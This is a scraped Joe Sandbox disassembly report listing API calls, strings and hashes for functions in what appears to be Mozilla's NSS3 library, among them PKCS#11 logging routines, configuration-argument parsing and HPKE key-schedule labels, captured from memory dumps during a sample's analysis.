Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: sqlite3_free$strlen$sqlite3_snprintf$CriticalSectionmemset$EnterLeavesqlite3_randomness
String ID: mz_etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
API String ID: 593473924-707647140
Opcode ID: 8f4499dce5b591d702f2e72f99bd5fedf84d1de7e0a8394cd764b751ccbec3cd
Instruction ID: 18c66c3d647a5eeef0539f475df49e1801979c91936bd5bece78f5c7724e553b
Opcode Fuzzy Hash: 8f4499dce5b591d702f2e72f99bd5fedf84d1de7e0a8394cd764b751ccbec3cd
Instruction Fuzzy Hash: D8517BB1A0111567E33097349E55FBB36568F9230CF148D38E81696FC2FB25A50FC2D6

Function 6C7D4FE0 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 175COMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7875C2,00000000,00000000,00000001), ref: 6C7D5009
PL_strncasecmp.NSS3(?,library=,00000008,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7875C2,00000000), ref: 6C7D5049
PL_strncasecmp.NSS3(?,name=,00000005,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C7D505D
PL_strncasecmp.NSS3(?,parameters=,0000000B,?,?,?,?,?,?,?,?), ref: 6C7D5071
PL_strncasecmp.NSS3(?,nss=,00000004,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7D5089
PL_strncasecmp.NSS3(?,config=,00000007,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7D50A1
NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6C7D50B2
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7875C2), ref: 6C7D50CB
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C7D50D9
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C7D50F5
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7D5103
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7D511D
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7D512B
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7D5145
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7D5153
free.MOZGLUE(?), ref: 6C7D516D
NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6C7D517B
isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C7D5195

Strings

library=, xrefs: 6C7D5043
parameters=, xrefs: 6C7D506B
config=, xrefs: 6C7D509B
nss=, xrefs: 6C7D5083
name=, xrefs: 6C7D5057

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: FetchL_strncasecmpValuefree$isspace$ParameterSkip
String ID: config=$library=$name=$nss=$parameters=
API String ID: 391827415-203331871
Opcode ID: 39b4f7ddbb139041d975b7a65f757b0ea5a595f64629a3c7a8b1f2fa11860544
Instruction ID: e7c99b9cd1d05e2838c6d38c3227aefae915a288abc9750f81d43dddb011b1a0
Opcode Fuzzy Hash: 39b4f7ddbb139041d975b7a65f757b0ea5a595f64629a3c7a8b1f2fa11860544
Instruction Fuzzy Hash: BD51D7F1A012166BEB50DF24EE45AAA37B8DF06248F190430EC59E7741EB26F915C7F2

Function 6C7A8E50 Relevance: 40.4, APIs: 14, Strings: 9, Instructions: 169COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_WrapKey), ref: 6C7A8E76
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C7A8EA4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7A8EB3

Part of subcall function 6C88D930: PL_strncpyz.NSS3(?,?,?), ref: 6C88D963

PR_LogPrint.NSS3(?,00000000), ref: 6C7A8EC9
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C7A8EE5
PL_strncpyz.NSS3(?, hWrappingKey = 0x%x,00000050), ref: 6C7A8F17
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7A8F29
PR_LogPrint.NSS3(?,00000000), ref: 6C7A8F3F
PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C7A8F71
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7A8F80
PR_LogPrint.NSS3(?,00000000), ref: 6C7A8F96
PR_LogPrint.NSS3( pWrappedKey = 0x%p,?), ref: 6C7A8FB2
PR_LogPrint.NSS3( pulWrappedKeyLen = 0x%p,?), ref: 6C7A8FCD
PR_LogPrint.NSS3( *pulWrappedKeyLen = 0x%x,?), ref: 6C7A9047

Strings

*pulWrappedKeyLen = 0x%x, xrefs: 6C7A9042
hKey = 0x%x, xrefs: 6C7A8F5B, 6C7A8F6B
pulWrappedKeyLen = 0x%p, xrefs: 6C7A8FC8
hWrappingKey = 0x%x, xrefs: 6C7A8F01, 6C7A8F11
pWrappedKey = 0x%p, xrefs: 6C7A8FAD
(CK_INVALID_HANDLE), xrefs: 6C7A8EAC, 6C7A8F1F, 6C7A8F79
C_WrapKey, xrefs: 6C7A8E71
pMechanism = 0x%p, xrefs: 6C7A8EE0
hSession = 0x%x, xrefs: 6C7A8E8E, 6C7A8E9E

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulWrappedKeyLen = 0x%x$ hKey = 0x%x$ hSession = 0x%x$ hWrappingKey = 0x%x$ pMechanism = 0x%p$ pWrappedKey = 0x%p$ pulWrappedKeyLen = 0x%p$ (CK_INVALID_HANDLE)$C_WrapKey
API String ID: 1003633598-4293906258
Opcode ID: 22d289d204981b75711549e9f796da997a7af330e21ec90051e834ce6c293bac
Instruction ID: 5f8a812f1d23341897fc85f06023619daf93d30b87656baf1393657095106de6
Opcode Fuzzy Hash: 22d289d204981b75711549e9f796da997a7af330e21ec90051e834ce6c293bac
Instruction Fuzzy Hash: 5351F431502155EFDB209F988F4CF9A7B76AB4631CF048476F90867A12D734BC1ACB91

Function 6C7D4C10 Relevance: 40.4, APIs: 13, Strings: 10, Instructions: 146stringmemoryCOMMON

Download Yara Rule

APIs

PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6C7C4F51,00000000), ref: 6C7D4C50
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C7C4F51,00000000), ref: 6C7D4C5B
PR_smprintf.NSS3(6C8AAAF9,?,0000002F,?,?,?,00000000,00000000,?,6C7C4F51,00000000), ref: 6C7D4C76
PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6C7C4F51,00000000), ref: 6C7D4CAE
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7D4CC9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7D4CF4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7D4D0B
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C7C4F51,00000000), ref: 6C7D4D5E
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C7C4F51,00000000), ref: 6C7D4D68
PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6C7D4D85
PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6C7D4DA2
free.MOZGLUE(?), ref: 6C7D4DB9
free.MOZGLUE(00000000), ref: 6C7D4DCF

Strings

every, xrefs: 6C7D4CA1
slotFlags, xrefs: 6C7D4D34
timeout, xrefs: 6C7D4C91
0x%08lx=[%s askpw=%s timeout=%d %s], xrefs: 6C7D4D9D
%s,%s, xrefs: 6C7D4C4B
any, xrefs: 6C7D4C96
0x%08lx=[%s %s], xrefs: 6C7D4D80
ootT, xrefs: 6C7D4D1A
rust, xrefs: 6C7D4D22
rootFlags, xrefs: 6C7D4D47

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: free$R_smprintf$strlen$Alloc_Util
String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
API String ID: 3756394533-2552752316
Opcode ID: f177ec899e00ec3cd0ebfb13c9a4d36720d19c5b54a216b12720f9ba52708a46
Instruction ID: 53e1dde75d0529bd00ca2d3e86901273953251d1d846f56983d7e746eb38187d
Opcode Fuzzy Hash: f177ec899e00ec3cd0ebfb13c9a4d36720d19c5b54a216b12720f9ba52708a46
Instruction Fuzzy Hash: 3A41ADF1900141ABDB215F54DE49ABA3665AF8230CF5A4134E80A1BB02E731F925D7D3

Function 6C7B6910 Relevance: 38.6, APIs: 15, Strings: 7, Instructions: 131COMMON

Download Yara Rule

APIs

NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6C7B6943

Part of subcall function 6C7D4210: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,731E398C,flags,?,00000000,?,6C7B5947,flags,printPolicyFeedback,?,?,?,?,?,?,00000000), ref: 6C7D4220
Part of subcall function 6C7D4210: NSSUTIL_ArgGetParamValue.NSS3(?,GY{l,?,?,?,?,?,?,00000000,?,00000000,?,6C7B7703,?,00000000,00000000), ref: 6C7D422D
Part of subcall function 6C7D4210: PL_strncasecmp.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C7B7703), ref: 6C7D424B
Part of subcall function 6C7D4210: free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C7B7703,?,00000000), ref: 6C7D4272

NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6C7B6957
NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6C7B6972
NSSUTIL_ArgStrip.NSS3(00000000), ref: 6C7B6983

Part of subcall function 6C7D3EA0: isspace.API-MS-WIN-CRT-STRING-L1-1-0(8914C483,70E85609,6C7AC79F,?,6C7B6247,70E85609,?,?,6C7AC79F,6C7B781D,?,6C7ABD52,00000001,70E85609,D85D8B04,?), ref: 6C7D3EB8

PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6C7B69AA
PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6C7B69BE
PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6C7B69D2
NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6C7B69DF

Part of subcall function 6C7D4020: isspace.API-MS-WIN-CRT-STRING-L1-1-0(FFFFEF69,00000000,?,?,74F84C80,?,6C7D50B7,?), ref: 6C7D4041

free.MOZGLUE(00000000), ref: 6C7B69F6
NSSUTIL_ArgFetchValue.NSS3(-0000000A,?), ref: 6C7B6A04
free.MOZGLUE(00000000), ref: 6C7B6A1B
NSSUTIL_ArgFetchValue.NSS3(-0000000B,?), ref: 6C7B6A29
free.MOZGLUE(00000000), ref: 6C7B6A3F
NSSUTIL_ArgFetchValue.NSS3(-0000000A,?), ref: 6C7B6A4D
NSSUTIL_ArgStrip.NSS3(?), ref: 6C7B6A5B

Strings

certPrefix=, xrefs: 6C7B69B8
readOnly, xrefs: 6C7B693D
flags, xrefs: 6C7B6937, 6C7B6942, 6C7B6956, 6C7B696D
configdir=, xrefs: 6C7B69A4
nokeydb, xrefs: 6C7B6968
keyPrefix=, xrefs: 6C7B69CC
nocertdb, xrefs: 6C7B6951

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: L_strncasecmpValuefree$FetchFlag$Stripisspace$ParamParameterSkipstrlen
String ID: certPrefix=$configdir=$flags$keyPrefix=$nocertdb$nokeydb$readOnly
API String ID: 2065226673-2785624044
Opcode ID: 175d890d679ca253d27263100453d0be59c93fb70517813b65462e43c7989b79
Instruction ID: 6e5303f98186c482b77e6d857002a8c42f8ac6131096f1c23d6b1ef103bb0bd3
Opcode Fuzzy Hash: 175d890d679ca253d27263100453d0be59c93fb70517813b65462e43c7989b79
Instruction Fuzzy Hash: 3F41A7F1A402056BEB10DF75AE85B5B77ACAF0524CF080830EA09F6741F735EA18C7A1

Function 6C7B6CD0 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 298stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C7B6910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6C7B6943
Part of subcall function 6C7B6910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6C7B6957
Part of subcall function 6C7B6910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6C7B6972
Part of subcall function 6C7B6910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6C7B6983
Part of subcall function 6C7B6910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6C7B69AA
Part of subcall function 6C7B6910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6C7B69BE
Part of subcall function 6C7B6910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6C7B69D2
Part of subcall function 6C7B6910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6C7B69DF
Part of subcall function 6C7B6910: NSSUTIL_ArgStrip.NSS3(?), ref: 6C7B6A5B

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C7B6D8C
free.MOZGLUE(00000000), ref: 6C7B6DC5
free.MOZGLUE(?), ref: 6C7B6DD6
free.MOZGLUE(?), ref: 6C7B6DE7
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C7B6E1F
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C7B6E4B
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C7B6E72
free.MOZGLUE(?), ref: 6C7B6EA7
free.MOZGLUE(?), ref: 6C7B6EC4
free.MOZGLUE(?), ref: 6C7B6ED5
free.MOZGLUE(00000000), ref: 6C7B6EE3
free.MOZGLUE(?), ref: 6C7B6EF4
free.MOZGLUE(?), ref: 6C7B6F08
free.MOZGLUE(00000000), ref: 6C7B6F35
free.MOZGLUE(?), ref: 6C7B6F44
free.MOZGLUE(?), ref: 6C7B6F5B
free.MOZGLUE(00000000), ref: 6C7B6F65

Part of subcall function 6C7B6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C7B781D,00000000,6C7ABE2C,?,6C7B6B1D,?,?,?,?,00000000,00000000,6C7B781D), ref: 6C7B6C40
Part of subcall function 6C7B6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C7B781D,?,6C7ABE2C,?), ref: 6C7B6C58
Part of subcall function 6C7B6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C7B781D), ref: 6C7B6C6F
Part of subcall function 6C7B6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C7B6C84
Part of subcall function 6C7B6C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C7B6C96
Part of subcall function 6C7B6C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C7B6CAA

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C7B6F90
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C7B6FC5
PK11_GetInternalKeySlot.NSS3 ref: 6C7B6FF4

Strings

+`|l, xrefs: 6C7B6D0D

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
String ID: +`|l
API String ID: 1304971872-3643680650
Opcode ID: 682faba1504c722236518796e5e00aea7659d53f37002e8fa7edcaf600f460ca
Instruction ID: cf43ed0f09616af22ec8ad4a7062b25fe27b940a566252fb9b7644d2369c2542
Opcode Fuzzy Hash: 682faba1504c722236518796e5e00aea7659d53f37002e8fa7edcaf600f460ca
Instruction Fuzzy Hash: A1B14CB1E012099FDF14DFA9DA45B9EBBB8BF05248F140034EA15F7A41E731EA15CBA1

Function 6C7A4950 Relevance: 36.9, APIs: 13, Strings: 8, Instructions: 170COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_CopyObject), ref: 6C7A4976
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C7A49A7
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7A49B6

Part of subcall function 6C88D930: PL_strncpyz.NSS3(?,?,?), ref: 6C88D963

PR_LogPrint.NSS3(?,00000000), ref: 6C7A49CC
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C7A49FA
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7A4A09
PR_LogPrint.NSS3(?,00000000), ref: 6C7A4A1F
PR_LogPrint.NSS3( pTemplate = 0x%p,?), ref: 6C7A4A40
PR_LogPrint.NSS3( ulCount = %d,?), ref: 6C7A4A5C
PR_LogPrint.NSS3( phNewObject = 0x%p,?), ref: 6C7A4A7C
PL_strncpyz.NSS3(?, *phNewObject = 0x%x,00000050), ref: 6C7A4B17
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7A4B26
PR_LogPrint.NSS3(?,00000000), ref: 6C7A4B3C

Strings

phNewObject = 0x%p, xrefs: 6C7A4A77
hObject = 0x%x, xrefs: 6C7A49E4, 6C7A49F4
*phNewObject = 0x%x, xrefs: 6C7A4B01, 6C7A4B11
(CK_INVALID_HANDLE), xrefs: 6C7A49AF, 6C7A4A02, 6C7A4B1F
pTemplate = 0x%p, xrefs: 6C7A4A39
C_CopyObject, xrefs: 6C7A4971
hSession = 0x%x, xrefs: 6C7A4991, 6C7A49A1
ulCount = %d, xrefs: 6C7A4A57

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *phNewObject = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pTemplate = 0x%p$ phNewObject = 0x%p$ ulCount = %d$ (CK_INVALID_HANDLE)$C_CopyObject
API String ID: 1003633598-1222337137
Opcode ID: 0884e6bc1052ae0019107518b6c085af99dca01bf6109e9be58651f0a5fedbe6
Instruction ID: cf4dd09a983fca9ccaf7f7d9cad3dae377228545a72ad926320f18cd879f9ec6
Opcode Fuzzy Hash: 0884e6bc1052ae0019107518b6c085af99dca01bf6109e9be58651f0a5fedbe6
Instruction Fuzzy Hash: FA51E631602114ABDB20CF988F8CFAA7775AB4631DF044435F80567B12CB25BD1ADBE5

Function 6C7A08F0 Relevance: 33.5, APIs: 13, Strings: 6, Instructions: 230COMMON

Download Yara Rule

APIs

htonl.WSOCK32(-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 6C7A094D
htonl.WSOCK32(-00000001,-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7A0953
htonl.WSOCK32(-00000001,-00000001,-00000001), ref: 6C7A096E
htonl.WSOCK32(-00000001,-00000001,-00000001,-00000001), ref: 6C7A0974
htonl.WSOCK32(-00000001,-00000001,-00000001,-00000001,-00000001), ref: 6C7A098F
htonl.WSOCK32(-00000001,-00000001,-00000001,-00000001,-00000001,-00000001), ref: 6C7A0995

Part of subcall function 6C7A1800: SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C7A1860
Part of subcall function 6C7A1800: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00000000,?,-00000001,?,6C7A09BF), ref: 6C7A1897
Part of subcall function 6C7A1800: memcpy.VCRUNTIME140(?,-00000001,-00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C7A18AA
Part of subcall function 6C7A1800: memcpy.VCRUNTIME140(?,?,?), ref: 6C7A18C4

PK11_FreeSymKey.NSS3(00000000,?,?,?,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 6C7A0B4F
SECITEM_ZfreeItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 6C7A0B5E
SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 6C7A0B6B
SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,-00000001,-00000001), ref: 6C7A0B78

Strings

key, xrefs: 6C7A0ACB
exp, xrefs: 6C7A0B36
info_hash, xrefs: 6C7A09E0
secret, xrefs: 6C7A0A88
psk_id_hash, xrefs: 6C7A09B5
base_nonce, xrefs: 6C7A0B06

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: htonl$Item_Util$Zfreememcpy$AllocFreeK11_
String ID: base_nonce$exp$info_hash$key$psk_id_hash$secret
API String ID: 1637529542-763765719
Opcode ID: 7fff4beb9ee894d48f7e0128f60a70bdced9c721599a3742843fbbd62e7de5ff
Instruction ID: 3f679d86b0982db1e1235a23e5a42ffd455a90770f329f305ac7491c602b03cb
Opcode Fuzzy Hash: 7fff4beb9ee894d48f7e0128f60a70bdced9c721599a3742843fbbd62e7de5ff
Instruction Fuzzy Hash: B6817B75604305AFC710CF95CE8499AF7E8FF88308F048A29F95997751E731E91ACB92

Function 6C7A89B0 Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 149COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GenerateKey), ref: 6C7A89D6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C7A8A04
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7A8A13

Part of subcall function 6C88D930: PL_strncpyz.NSS3(?,?,?), ref: 6C88D963

PR_LogPrint.NSS3(?,00000000), ref: 6C7A8A29
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C7A8A4B
PR_LogPrint.NSS3( pTemplate = 0x%p,?), ref: 6C7A8A67
PR_LogPrint.NSS3( ulCount = %d,?), ref: 6C7A8A83
PR_LogPrint.NSS3( phKey = 0x%p,?), ref: 6C7A8AA1
PL_strncpyz.NSS3(?, *phKey = 0x%x,00000050), ref: 6C7A8B43
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7A8B52
PR_LogPrint.NSS3(?,00000000), ref: 6C7A8B68

Strings

phKey = 0x%p, xrefs: 6C7A8A9C
C_GenerateKey, xrefs: 6C7A89D1
(CK_INVALID_HANDLE), xrefs: 6C7A8A0C, 6C7A8B4B
pTemplate = 0x%p, xrefs: 6C7A8A62
*phKey = 0x%x, xrefs: 6C7A8B2D, 6C7A8B3D
pMechanism = 0x%p, xrefs: 6C7A8A46
hSession = 0x%x, xrefs: 6C7A89EE, 6C7A89FE
ulCount = %d, xrefs: 6C7A8A7E

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
